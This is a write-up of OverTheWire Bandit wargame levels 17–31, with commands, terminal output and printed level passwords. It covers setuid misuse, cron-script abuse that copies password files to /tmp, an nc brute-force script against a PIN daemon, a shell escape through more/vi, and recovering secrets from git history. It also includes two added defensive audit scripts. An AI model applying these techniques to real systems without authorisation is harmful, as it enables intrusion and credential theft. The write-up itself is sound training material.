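Preface
OverTheWire is a platform that offers network security wargames, and Bandit is one of its most popular series. Bandit focuses on Linux fundamentals: through a sequence of progressively harder tasks it walks the user through basic command-line operation, file management, permission control, script writing and similar skills. The game is designed for beginners and aims to help them master basic command-line operation and network security skills.
Challenge URL: https://overthewire.org/wargames/bandit/
1. Target information (SSH information)
host: bandit.labs.overthewire.org
port: 2220
Xshell can connect but tends to run into small problems; using Kali Linux directly for the levels is recommended.
Initial account: bandit0
Initial password: bandit0 (the passwords of the other accounts are 32-character strings)
2. Solution steps and key points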
18.level17-level18
goal:There are 2 files in the homedirectory: passwords.old and passwords.new. The password for the next level is in passwords.new and is the only line that has been changed between passwords.old and passwords.new
NOTE: if you have solved this level and see ‘Byebye!’ when trying to log into bandit18, this is related to the next level, bandit19.
Tips: diff.
- Approach:
diff passwords.new passwords.old
Terminal output:
bandit17@bandit:~$ ls
passwords.new passwords.old
bandit17@bandit:~$ diff passwords.new passwords.old
42c42
< x2gLTTjFwMOhQ8oWNbMN362QKxfRqGlO #password for bandit18
---
> ktfgBvpMzWKR5ENj26IbLGSblgUG9CzB
The password obtained for the next-level account bandit18 is: x2gLTTjFwMOhQ8oWNbMN362QKxfRqGlO
ssh -p2220 bandit18@bandit.labs.overthewire.org #log in to bandit18
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh -p2220 bandit18@bandit.labs.overthewire.org
-[ More information ]--
For more information regarding individual wargames, visit
http://www.overthewire.org/wargames/
For support, questions or comments, contact us on discord or IRC.
Enjoy your stay!
Byebye !
Connection to bandit.labs.overthewire.org closed.
19.level18-level19
goal:The password for the next level is stored in a file readme in the homedirectory. Unfortunately, someone has modified .bashrc to log you out when you log in with SSH.
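- Key point 1: .bashrc is the configuration file of the Bash shell and is executed whenever a new interactive Bash session starts. If the file contains a command that logs the user out, such as exit or logout, you are logged out immediately every time you try to log in.
- Approach:
- Append the command to run directly after the ssh command.
- Alternatively, start another interactive bash directly.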
ssh -p2220 bandit18@bandit.labs.overthewire.org 'cat ./readme'
Terminal output:
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh -p2220 bandit18@bandit.labs.overthewire.org 'cat ./readme'
_ _ _ _
| |__ __ _ _ __ __| (_) |_
| '_ \ / _` | '_ \ / _` | | __|
| |_) | (_| | | | | (_| | | |_
|_.__/ \__,_|_| |_|\__,_|_|\__|
This is an OverTheWire game server.
More information on http://www.overthewire.org/wargames
bandit18@bandit.labs.overthewire.org's password:
cGWpMaKXVwDUNgPAVJbWYuGHVn9zl3j8
=================================== Method 2 ============================
ssh -p2220 bandit18@bandit.labs.overthewire.org 'echo "Skipping .bashrc" && bash'
_ _ _ _
| |__ __ _ _ __ __| (_) |_
| '_ \ / _` | '_ \ / _` | | __|
| |_) | (_| | | | | (_| | | |_
|_.__/ \__,_|_| |_|\__,_|_|\__|
This is an OverTheWire game server.
More information on http://www.overthewire.org/wargames
bandit18@bandit.labs.overthewire.org's password:
Skipping .bashrc
ls
readme
cat ./readme
cGWpMaKXVwDUNgPAVJbWYuGHVn9zl3j8
The password obtained for the next-level account bandit19 is: cGWpMaKXVwDUNgPAVJbWYuGHVn9zl3j8
ssh -p2220 bandit19@bandit.labs.overthewire.org #log in to bandit19
20.level19-level20
goal:To gain access to the next level, you should use the setuid binary in the homedirectory. Execute it without arguments to find out how to use it. The password for this level can be found in the usual place (/etc/bandit_pass), after you have used the setuid binary.
- Approach:
./bandit20-do cat /etc/bandit_pass/bandit20
Terminal output:
bandit19@bandit:~$ ls
bandit20-do
bandit19@bandit:~$ ./bandit20-do whoami
bandit20
bandit19@bandit:~$ ls /etc/bandit_pass/
bandit0 bandit11 bandit14 bandit17 bandit2 bandit22 bandit25 bandit28 bandit30 bandit33 bandit6 bandit9
bandit1 bandit12 bandit15 bandit18 bandit20 bandit23 bandit26 bandit29 bandit31 bandit4 bandit7
bandit10 bandit13 bandit16 bandit19 bandit21 bandit24 bandit27 bandit3 bandit32 bandit5 bandit8
bandit19@bandit:~$ ./bandit20-do cat /etc/bandit_pass/bandit20
0qXahG8ZjOVMN9Ghs7iOWsCfZyXOUbYO
The password obtained for the next-level account bandit20 is: 0qXahG8ZjOVMN9Ghs7iOWsCfZyXOUbYO
ssh -p2220 bandit20@bandit.labs.overthewire.org #log in to bandit20
21.level20-level21
goal:There is a setuid binary in the home directory that does the following: it connects to localhost on the port you specify as a command-line argument. It then reads a line of text from the connection and compares it with the password of the previous level (bandit20). If the password is correct, it transmits the password for the next level (bandit21).
- Approach:
nc -lvp 2333 < /etc/bandit_pass/bandit20 & # & runs the command in the background
./suconnect 2333
Terminal output:
bandit20@bandit:~$ ls
suconnect
bandit20@bandit:~$ nc -lvp 2333 < /etc/bandit_pass/bandit20 &
[2] 858814
bandit20@bandit:~$ Listening on 0.0.0.0 2333
./suconnect 2333
Connection received on localhost 49826
Read: 0qXahG8ZjOVMN9Ghs7iOWsCfZyXOUbYO
Password matches, sending next password
EeoULMCra2q0dSkYj561DX7s1CpBuOBt #bandit21 password
[2]+ Done nc -lvp 2333 < /etc/bandit_pass/bandit20
The password obtained for the next-level account bandit21 is: EeoULMCra2q0dSkYj561DX7s1CpBuOBt
ssh -p2220 bandit21@bandit.labs.overthewire.org #log in to bandit21
22.level21-level22
goal:A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
- Approach:
Terminal output:
bandit21@bandit:~$ ls /etc/cron.d
cronjob_bandit22 cronjob_bandit23 cronjob_bandit24 e2scrub_all otw-tmp-dir sysstat
bandit21@bandit:~$ cat /etc/cron.d/cronjob_bandit22
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
bandit21@bandit:~$ cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
bandit21@bandit:~$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
tRae0UfB9v0UzbCdn9cY0gQnds9GF58Q # bandit22 password
The password obtained for the next-level account bandit22 is: tRae0UfB9v0UzbCdn9cY0gQnds9GF58Q
ssh -p2220 bandit22@bandit.labs.overthewire.org #log in to bandit22
23.level22-level23
goal:A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: Looking at shell scripts written by other people is a very useful skill. The script for this level is intentionally made easy to read. If you are having problems understanding what it does, try executing it to see the debug information it prints…
- Approach: read the script, then change it so that myname=bandit23
Terminal output:
bandit22@bandit:~$ ls /etc/cron.d
cronjob_bandit22 cronjob_bandit23 cronjob_bandit24 e2scrub_all otw-tmp-dir sysstat
bandit22@bandit:~$ cat /etc/cron.d/cronjob_bandit23
@reboot bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
bandit22@bandit:~$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash
myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)
echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"
cat /etc/bandit_pass/$myname > /tmp/$mytarget
bandit22@bandit:~$ sh /usr/bin/cronjob_bandit23.sh
Copying passwordfile /etc/bandit_pass/bandit22 to /tmp/8169b67bd894ddbb4412f91573b38db3
bandit22@bandit:~$ cp /usr/bin/cronjob_bandit23.sh /tmp/bandit_pass
bandit22@bandit:/tmp$ vim /tmp/bandit_pass # **change to myname=bandit23**
bandit22@bandit:/tmp$ sh /tmp/bandit_pass
Copying passwordfile /etc/bandit_pass/bandit23 to /tmp/8ca319486bfbbc3663ea0fbe81326349
/tmp/bandit_pass: 8: cannot create /tmp/8ca319486bfbbc3663ea0fbe81326349: Permission denied
bandit22@bandit:/tmp$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
0Zf11ioIjMVN551jX3CmStKLYqjk54Ga #bandit23 password
bandit22@bandit:/tmp$
The password obtained for the next-level account bandit23 is: 0Zf11ioIjMVN551jX3CmStKLYqjk54Ga
ssh -p2220 bandit23@bandit.labs.overthewire.org #log in to bandit23
24.level23-level24
goal:A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…
- Approach:
The cron script uses the whoami command to get the current user name and stores it in the variable myname.
It changes the working directory to /var/spool/$myname/foo, where $myname is the user name obtained above, so it enters a directory specific to the current user.
It prints a message saying that it will execute and delete all scripts in /var/spool/$myname/foo.
It uses a for loop to iterate over all files and directories in that directory.
For each file or directory i that is not the current directory (.) or the parent directory (..), it does the following:
It prints the name of the file being handled, $i.
It uses the stat command to get the owner of the file and stores it in the variable owner.
If the owner of the file is bandit23, it runs the script with the timeout command, allowing at most 60 seconds; if the script has not finished within that time, signal 9 (SIGKILL) is sent to terminate it.
After execution, it deletes the script file with rm -f.
=============================
cd /var/spool/bandit24/foo/ # change to this directory and write a script
vim ./get_pass.sh # create a new script owned by bandit23; it is deleted automatically after it runs. Script contents:
cat /etc/bandit_pass/bandit24 > /tmp/bandit24_pass # then read /tmp/bandit24_pass directly
=============================
Terminal output:
bandit23@bandit:~$ ls /etc/cron.d
cronjob_bandit22 cronjob_bandit24 otw-tmp-dir
cronjob_bandit23 e2scrub_all sysstat
bandit23@bandit:~$ cat /etc/cron.d/cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash
myname=$(whoami)
cd /var/spool/$myname/foo
echo "Executing and deleting all scripts in /var/spool/$myname/foo:"
for i in * .*;
do
if [ "$i" != "." -a "$i" != ".." ];
then
echo "Handling $i"
owner="$(stat --format "%U" ./$i)"
if [ "${owner}" = "bandit23" ]; then
timeout -s 9 60 ./$i
fi
rm -f ./$i
fi
done
bandit23@bandit:~$ cd /var/spool/bandit24/foo/
bandit23@bandit:/var/spool/bandit24/foo$ vim ./get_pass.sh
bandit23@bandit:/var/spool/bandit24/foo$ cat /tmp/bandit24_pass
gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8 ##bandit24 password
bandit23@bandit:/var/spool/bandit24/foo$ cat ./get_pass.sh
cat: ./get_pass.sh: No such file or directory
vim ./get_pass.sh # script contents shown below; remember to cd /var/spool/bandit24/foo/ first
#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/bandit24_pass
The password obtained for the next-level account bandit24 is: gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8
ssh -p2220 bandit24@bandit.labs.overthewire.org #log in to bandit24
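The cron jobs in levels 21 to 24 show two patterns a defender can check for: a job that redirects data into /tmp, and a job that changes into a directory other users can write to and runs what it finds there. The audit script below is an added example, not part of the original write-up or of OverTheWire. Its sample tree is constructed from the cron files and scripts listed above (the bandit24 script is abridged); the 0777 mode on the spool directory and the expansion of $myname to the job's user are assumptions.

```bash
#!/bin/sh
# Added example: audit /etc/cron.d-style jobs for the patterns seen in levels 21-24.

# Print "user<TAB>script" once for every job in a cron.d-format file.
cron_jobs() {
    awk '
        /^[ \t]*(#|$)/             { next }                    # comments, blank lines
        /^[ \t]*[A-Za-z_]+[ \t]*=/ { next }                    # environment assignments
        $1 ~ /^@/                  { print $2 "\t" $3; next }  # @reboot user command
        NF >= 7                    { print $6 "\t" $7 }        # m h dom mon dow user command
    ' "$1" | sort -u
}

# $1 = cron file, $2 = root prefix of the tree to inspect ("" for the live system).
audit_cron_file() {
    cron_jobs "$1" | while IFS="$(printf '\t')" read -r user script; do
        [ -r "$2$script" ] || continue
        # Pattern 1: output redirected into /tmp, where every local user can look.
        grep -n -E '>[[:space:]]*/tmp/' "$2$script" | while IFS=: read -r n rest; do
            printf '%s %s:%s writes-to-tmp\n' "$user" "$script" "$n"
        done
        # Pattern 2: cd into a world-writable directory. Assumption: $myname is the
        # job's user, as in scripts that set myname=$(whoami).
        sed -n 's/^[[:space:]]*cd[[:space:]][[:space:]]*\([^;&|[:space:]]*\).*/\1/p' "$2$script" |
        while IFS= read -r dir; do
            dir=$(printf '%s' "$dir" | sed "s/[\$]myname/$user/g")
            if [ -n "$(find "$2$dir" -prune -type d -perm -0002 2>/dev/null)" ]; then
                printf '%s %s cd-into-world-writable %s\n' "$user" "$script" "$dir"
            fi
        done
    done
}

# Constructed sample tree that mirrors the listings in this write-up.
make_sample_tree() {
    root=$(mktemp -d) || return 1
    mkdir -p "$root/etc/cron.d" "$root/usr/bin" "$root/var/spool/bandit24/foo"
    chmod 0777 "$root/var/spool/bandit24/foo"   # assumed mode, not shown in the write-up
    for n in 22 24; do
        printf '%s\n' "@reboot bandit$n /usr/bin/cronjob_bandit$n.sh &> /dev/null" \
            "* * * * * bandit$n /usr/bin/cronjob_bandit$n.sh &> /dev/null" \
            > "$root/etc/cron.d/cronjob_bandit$n"
    done
    cat > "$root/usr/bin/cronjob_bandit22.sh" <<'EOF'
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
EOF
    cat > "$root/usr/bin/cronjob_bandit24.sh" <<'EOF'
#!/bin/bash
myname=$(whoami)
cd /var/spool/$myname/foo
for i in * .*; do
    [ "$(stat --format "%U" ./$i)" = "bandit23" ] && timeout -s 9 60 ./$i
    rm -f ./$i
done
EOF
    printf '%s\n' "$root"
}

# Demo: audit every cron file in the sample tree, then clean up.
tree=$(make_sample_tree) && {
    for f in "$tree"/etc/cron.d/*; do audit_cron_file "$f" "$tree"; done
    rm -rf "$tree"
}
```

Passing an empty string as the second argument runs the same checks against the real /etc/cron.d files of a host.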
25.level24-level25
goal:A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.You do not need to create new connections each time.
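To solve this challenge you need to brute-force the pincode. Because it is a 4-digit code, there are 10,000 possible combinations (from 0000 to 9999). You can write a script to automate the process by connecting to the daemon and trying each combination together with the bandit24 password.
- Approach: brute force. Create the script with vim /tmp/brute_force/get_pass.sh and run it; splitting the range into 10 groups makes it run faster. password is the bandit24 password. The script is shown below.
Terminal output: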
#!/bin/bash
password="gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8"
# Start and end PIN of each group
declare -a start_pins=(0000 1000 2000 3000 4000 5000 6000 7000 8000 9000)
declare -a end_pins=(0999 1999 2999 3999 4999 5999 6999 7999 8999 9999)
# Function that brute-forces one PIN range
brute_force_range() {
    local start=$1
    local end=$2
    for pin in $(seq -w "$start" "$end"); do
        echo "Trying pin: $pin"
        # Capture the response from the daemon
        response=$(echo "$password $pin" | nc -q 1 localhost 30002)
        # Print the response to see it in the output
        echo "$response"
        # If the response is not the wrong password message, stop all brute force processes
        if [[ "$response" != *"Wrong"* ]]; then
            echo "Correct pin found: $pin"
            kill -- -$$
            return
        fi
    done
}
# Wait for the background processes when the script exits
trap 'wait' EXIT
# Start 10 background processes
for i in "${!start_pins[@]}"; do
    brute_force_range "${start_pins[$i]}" "${end_pins[$i]}" &
done
# Wait for all background processes to finish
wait
echo "All brute force attempts completed."
Run the script: bash /tmp/brute_force/get_pass.sh
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Wrong! Please enter the correct current password and pincode. Try again.
Trying pin: 7298
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Wrong! Please enter the correct current password and pincode. Try again.
Trying pin: 6299
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Correct!
The password of user bandit25 is iCi86ttT4KSNe1armKiwbQNmB3YJP3q4
**Correct pin found: 9297**
Terminated
bandit24@bandit:/tmp/brute_force$
bandit24@bandit:/tmp/brute_force$ echo "gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8 9297" | nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Correct!
The password of user bandit25 is iCi86ttT4KSNe1armKiwbQNmB3YJP3q4
The PIN obtained for the next-level account bandit25 is: 9297
The password obtained for the next-level account bandit25 is: iCi86ttT4KSNe1armKiwbQNmB3YJP3q4
ssh -p2220 bandit25@bandit.labs.overthewire.org #log in to bandit25
26.level25-level26
goal:Logging in to bandit26 from bandit25 should be fairly easy… The shell for user bandit26 is not /bin/bash, but something else. Find out what it is, how it works and how to break out of it.
- Approach:
grep bandit26 /etc/passwd #find out what bandit26's login shell is
- The shell is /usr/bin/showtext; reading it shows that the script runs exit 0 and quits.
- Shrink the terminal window so that the more command has to paginate, press v to enter the editor view, then type : to run commands.
- e /etc/bandit_pass/bandit26 # e opens the given file in the editor
Terminal output:
bandit25@bandit:~$ grep bandit26 /etc/passwd
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
bandit25@bandit:~$ cat /usr/bin/showtext
#!/bin/sh
export TERM=linux
exec more ~/text.txt
exit 0
bandit25@bandit:~$ ls
bandit26.sshkey
bandit25@bandit:~$ ssh -i bandit26.sshkey bandit26@localhost -p2220
_ _ _ _ ___ __
| | | (_) | |__ \ / /
| |__ __ _ _ __ __| |_| |_ ) / /_
| '_ \ / _` | '_ \ / _` | | __| / / '_ \
--More--(66%)
#remember to shrink the window, press v to enter the editor view, then press the colon (:) to type commands
:e /etc/bandit_pass/bandit26
s0773xxkk0MXfdqOfPRVr9L3jJBUOgCZ
~
~
~
"/etc/bandit_pass/bandit26" [readonly] 1L, 33B
The password obtained for the next-level account bandit26 is: s0773xxkk0MXfdqOfPRVr9L3jJBUOgCZ
ssh -p2220 bandit26@bandit.labs.overthewire.org #log in to bandit26; the session exits automatically in the same way
27.level26-level27
goal:Good job getting a shell! Now hurry and grab the password for bandit27!
- Approach: in the more session from the previous level, press v and then : to type commands
- First set a new shell: :set shell=/bin/bash
- Then run the shell; :shell gives a shell as bandit26
Terminal output:
:set shell=/bin/bash
:shell
[No write since last change]
bandit26@bandit:~$ ls
bandit27-do text.txt
bandit26@bandit:~$ ./bandit27-do cat /etc/bandit_pass/bandit27
upsNCc7vzaRDx6oZC6GiR6ERwe1MowGB
The password obtained for the next-level account bandit27 is: upsNCc7vzaRDx6oZC6GiR6ERwe1MowGB
ssh -p2220 bandit27@bandit.labs.overthewire.org #log in to bandit27
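Levels 25 to 27 work because the login shell /usr/bin/showtext wraps more, which can open an editor that can in turn start a shell. The script below is an added example (not from the original write-up or OverTheWire) of how an administrator could flag such accounts: it reads a passwd-format file and reports login shells that are scripts invoking a pager or editor. The allow-list, the program list, the bandit25 passwd line and the demo26 account with its cat-based variant are constructed for the example.

```bash
#!/bin/sh
# Added example: flag accounts whose login shell is a script that wraps an
# interactive program with a built-in editor or shell escape.

# Programs that can start an editor or a shell from inside (v in more, :shell in vi).
ESCAPABLE='more|less|man|vi|vim|view'
# Login shells treated as ordinary; an assumed allow-list for this example.
ALLOWED='/bin/sh /bin/bash /bin/false /usr/sbin/nologin'

# $1 = passwd-format file, $2 = root prefix of the tree to inspect ("" for the live system).
audit_login_shells() {
    while IFS=: read -r user pw uid gid gecos home shell; do
        [ -n "$shell" ] || continue
        case " $ALLOWED " in *" $shell "*) continue ;; esac
        if [ ! -f "$2$shell" ]; then
            printf '%s %s not-found\n' "$user" "$shell"
        elif ! head -n 1 "$2$shell" | grep -q '^#!'; then
            # Compiled wrappers cannot be read statically.
            printf '%s %s not-a-script:review-manually\n' "$user" "$shell"
        else
            progs=$(grep -v '^[[:space:]]*#' "$2$shell" |
                    grep -o -w -E "$ESCAPABLE" | sort -u | paste -s -d, -)
            if [ -n "$progs" ]; then
                printf '%s %s wraps:%s\n' "$user" "$shell" "$progs"
            else
                printf '%s %s custom-script:no-known-escape\n' "$user" "$shell"
            fi
        fi
    done < "$1"
    return 0
}

# Constructed sample: the bandit26 line and showtext are taken from the listing
# above; bandit25's line, demo26 and showtext-cat are made up for comparison.
make_sample_root() {
    root=$(mktemp -d) || return 1
    mkdir -p "$root/etc" "$root/usr/bin"
    cat > "$root/etc/passwd" <<'EOF'
bandit25:x:11025:11025:bandit level 25:/home/bandit25:/bin/bash
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
demo26:x:12026:12026:constructed account:/home/demo26:/usr/bin/showtext-cat
EOF
    cat > "$root/usr/bin/showtext" <<'EOF'
#!/bin/sh
export TERM=linux
exec more ~/text.txt
exit 0
EOF
    # Same purpose without a pager: cat prints the file and offers no interaction.
    cat > "$root/usr/bin/showtext-cat" <<'EOF'
#!/bin/sh
exec cat ~/text.txt
EOF
    printf '%s\n' "$root"
}

# Demo: audit the sample passwd file, then clean up.
sample=$(make_sample_root) && {
    audit_login_shells "$sample/etc/passwd" "$sample"
    rm -rf "$sample"
}
```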
28.level27-level28
goal:There is a git repository at ssh://bandit27-git@localhost/home/bandit27-git/repo via the port 2220. The password for the user bandit27-git is the same as for the user bandit27.Clone the repository and find the password for the next level.
- Approach:
Terminal output:
bandit27@bandit:mkdir /tmp/git-dir
bandit27@bandit:cd /tmp/git-dir
bandit27@bandit:/tmp/git-dir$ git clone ssh://bandit27-git@localhost:2220/home/bandit27-git/repo
Cloning into 'repo'...
The authenticity of host '[localhost]:2220 ([127.0.0.1]:2220)' can't be established.
ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Could not create directory '/home/bandit27/.ssh' (Permission denied).
Failed to add the host to the list of known hosts (/home/bandit27/.ssh/known_hosts).
_ _ _ _
| |__ __ _ _ __ __| (_) |_
| '_ \ / _` | '_ \ / _` | | __|
| |_) | (_| | | | | (_| | | |_
|_.__/ \__,_|_| |_|\__,_|_|\__|
This is an OverTheWire game server.
More information on http://www.overthewire.org/wargames
bandit27-git@localhost's password:
remote: Enumerating objects: 3, done.
remote: Counting objects: 100% (3/3), done.
remote: Compressing objects: 100% (2/2), done.
remote: Total 3 (delta 0), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (3/3), done.
bandit27@bandit:/tmp/git-dir$ ls
repo
bandit27@bandit:/tmp/git-dir$ ls repo/
README
bandit27@bandit:/tmp/git-dir$ cat repo/README
The password to the next level is: Yz9IpL0sBcCeuG7m9uQFt8ZNpS4HZRcN
The password obtained for the next-level account bandit28 is: Yz9IpL0sBcCeuG7m9uQFt8ZNpS4HZRcN
ssh -p2220 bandit28@bandit.labs.overthewire.org #log in to bandit28
29.level28-level29
goal:There is a git repository at ssh://bandit28-git@localhost/home/bandit28-git/repo via the port 2220. The password for the user bandit28-git is the same as for the user bandit28.
Clone the repository and find the password for the next level.
- Approach: run git log to read the commit history (one commit fixes an information leak)
- Use git checkout to switch to the commit made before the leak was fixed and read the password there.
Terminal output:
bandit28@bandit:/tmp$ mkdir /tmp/git-dir28
bandit28@bandit:/tmp$ cd /tmp/git-dir28
bandit28@bandit:/tmp/git-dir28$ git clone ssh://bandit28-git@localhost:2220/home/bandit28-git/repo
Cloning into 'repo'...
The authenticity of host '[localhost]:2220 ([127.0.0.1]:2220)' can't be established.
ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Could not create directory '/home/bandit28/.ssh' (Permission denied).
Failed to add the host to the list of known hosts (/home/bandit28/.ssh/known_hosts).
_ _ _ _
| |__ __ _ _ __ __| (_) |_
| '_ \ / _` | '_ \ / _` | | __|
| |_) | (_| | | | | (_| | | |_
|_.__/ \__,_|_| |_|\__,_|_|\__|
This is an OverTheWire game server.
More information on http://www.overthewire.org/wargames
bandit28-git@localhost's password:
remote: Enumerating objects: 9, done.
remote: Counting objects: 100% (9/9), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 9 (delta 2), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (9/9), done.
Resolving deltas: 100% (2/2), done.
bandit28@bandit:/tmp/git-dir28$ ls
repo
bandit28@bandit:/tmp/git-dir28$ cat repo/
cat: repo/: Is a directory
bandit28@bandit:/tmp/git-dir28$ ls ./repo/
README.md
bandit28@bandit:/tmp/git-dir28$ cat ./repo/README.md
# Bandit Notes
Some notes for level29 of bandit.
## credentials
- username: bandit29
- password: xxxxxxxxxx
==========
bandit28@bandit:/tmp/git-dir28$ cd repo/
bandit28@bandit:/tmp/git-dir28/repo$ git log
commit 817e303aa6c2b207ea043c7bba1bb7575dc4ea73 (HEAD -> master, origin/master, origin/HEAD)
Author: Morla Porla <morla@overthewire.org>
Date: Thu Sep 19 07:08:39 2024 +0000
fix info leak
commit 3621de89d8eac9d3b64302bfb2dc67e9a566decd
Author: Morla Porla <morla@overthewire.org>
Date: Thu Sep 19 07:08:39 2024 +0000
add missing data
commit 0622b73250502618babac3d174724bb303c32182
Author: Ben Dover <noone@overthewire.org>
Date: Thu Sep 19 07:08:39 2024 +0000
initial commit of README.md
bandit28@bandit:/tmp/git-dir28/repo$ git checkout 3621de89d8eac9d3b64302bfb2dc67e9a566decd
Note: switching to '3621de89d8eac9d3b64302bfb2dc67e9a566decd'.
You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by switching back to a branch.
If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -c with the switch command. Example:
git switch -c <new-branch-name>
Or undo this operation with:
git switch -
Turn off this advice by setting config variable advice.detachedHead to false
HEAD is now at 3621de8 add missing data
bandit28@bandit:/tmp/git-dir28/repo$ cat README.md
# Bandit Notes
Some notes for level29 of bandit.
## credentials
- username: bandit29
- password: 4pT1t5DENaYuqnqvadYs1oE4QLCdjmJ7
The password obtained for the next-level account bandit29 is: 4pT1t5DENaYuqnqvadYs1oE4QLCdjmJ7
ssh -p2220 bandit29@bandit.labs.overthewire.org #log in to bandit29
30.level29-level30
goal:There is a git repository at ssh://bandit29-git@localhost/home/bandit29-git/repo via the port 2220. The password for the user bandit29-git is the same as for the user bandit29.Clone the repository and find the password for the next level.
- Approach: the earlier steps are omitted; git clone the repository and look around
- git checkout to switch branches
- git branch -a
- git log
bandit29@bandit:~$ mkdir /tmp/git-dir29
bandit29@bandit:~$ cd /tmp/git-dir29
bandit29@bandit:/tmp/git-dir29$ git clone ssh://bandit29-git@localhost:2220/home/bandit29-git/repo
Terminal output:
bandit29@bandit:/tmp/git-dir29$ cat repo/README.md
# Bandit Notes
Some notes for bandit30 of bandit.
## credentials
- username: bandit30
- password: <no passwords in production!>
bandit29@bandit:/tmp/git-dir29/repo$ git branch -a
* master
remotes/origin/HEAD -> origin/master
remotes/origin/dev
remotes/origin/master
remotes/origin/sploits-dev
bandit29@bandit:/tmp/git-dir29/repo$ git log
commit 6ac7796430c0f39290a0e29a4d32e5126544b022 (HEAD -> master, origin/master, origin/HEAD)
Author: Ben Dover <noone@overthewire.org>
Date: Thu Sep 19 07:08:41 2024 +0000
fix username
commit e65a928cca4db1863b478cf5e93d1d5b1c1bd6b2
Author: Ben Dover <noone@overthewire.org>
Date: Thu Sep 19 07:08:41 2024 +0000
initial commit of README.md
bandit29@bandit:/tmp/git-dir29/repo$ git checkout remotes/origin/dev
Note: switching to 'remotes/origin/dev'.
You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by switching back to a branch.
If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -c with the switch command. Example:
git switch -c <new-branch-name>
Or undo this operation with:
git switch -
Turn off this advice by setting config variable advice.detachedHead to false
HEAD is now at 081ac38 add data needed for development
bandit29@bandit:/tmp/git-dir29/repo$ git log
commit 081ac380883f49b0d9dc76a82c53211ef7ba74b0 (HEAD, origin/dev)
Author: Morla Porla <morla@overthewire.org>
Date: Thu Sep 19 07:08:41 2024 +0000
add data needed for development
commit 03aa12c85ea4c1ea170b8e5fe80e55de7853b4db
Author: Ben Dover <noone@overthewire.org>
Date: Thu Sep 19 07:08:41 2024 +0000
add gif2ascii
commit 6ac7796430c0f39290a0e29a4d32e5126544b022 (origin/master, origin/HEAD, master)
Author: Ben Dover <noone@overthewire.org>
Date: Thu Sep 19 07:08:41 2024 +0000
fix username
commit e65a928cca4db1863b478cf5e93d1d5b1c1bd6b2
Author: Ben Dover <noone@overthewire.org>
Date: Thu Sep 19 07:08:41 2024 +0000
initial commit of README.md
bandit29@bandit:/tmp/git-dir29/repo$ git checkout 081ac380883f49b0d9dc76a82c53211ef7ba74b0
HEAD is now at 081ac38 add data needed for development
bandit29@bandit:/tmp/git-dir29/repo$ cat README.md
# Bandit Notes
Some notes for bandit30 of bandit.
## credentials
- username: bandit30
- password: qp30ex3VLz5MDG1n91YowTv4Q8l7CDZL
The password obtained for the next-level account bandit30 is: qp30ex3VLz5MDG1n91YowTv4Q8l7CDZL
ssh -p2220 bandit30@bandit.labs.overthewire.org #log in to bandit30
31.level30-level31
goal:There is a git repository at ssh://bandit30-git@localhost/home/bandit30-git/repo via the port 2220. The password for the user bandit30-git is the same as for the user bandit30.Clone the repository and find the password for the next level.
- Approach: the earlier steps are omitted; git clone the repository and look around
- git tag
- git show secret
Terminal output:
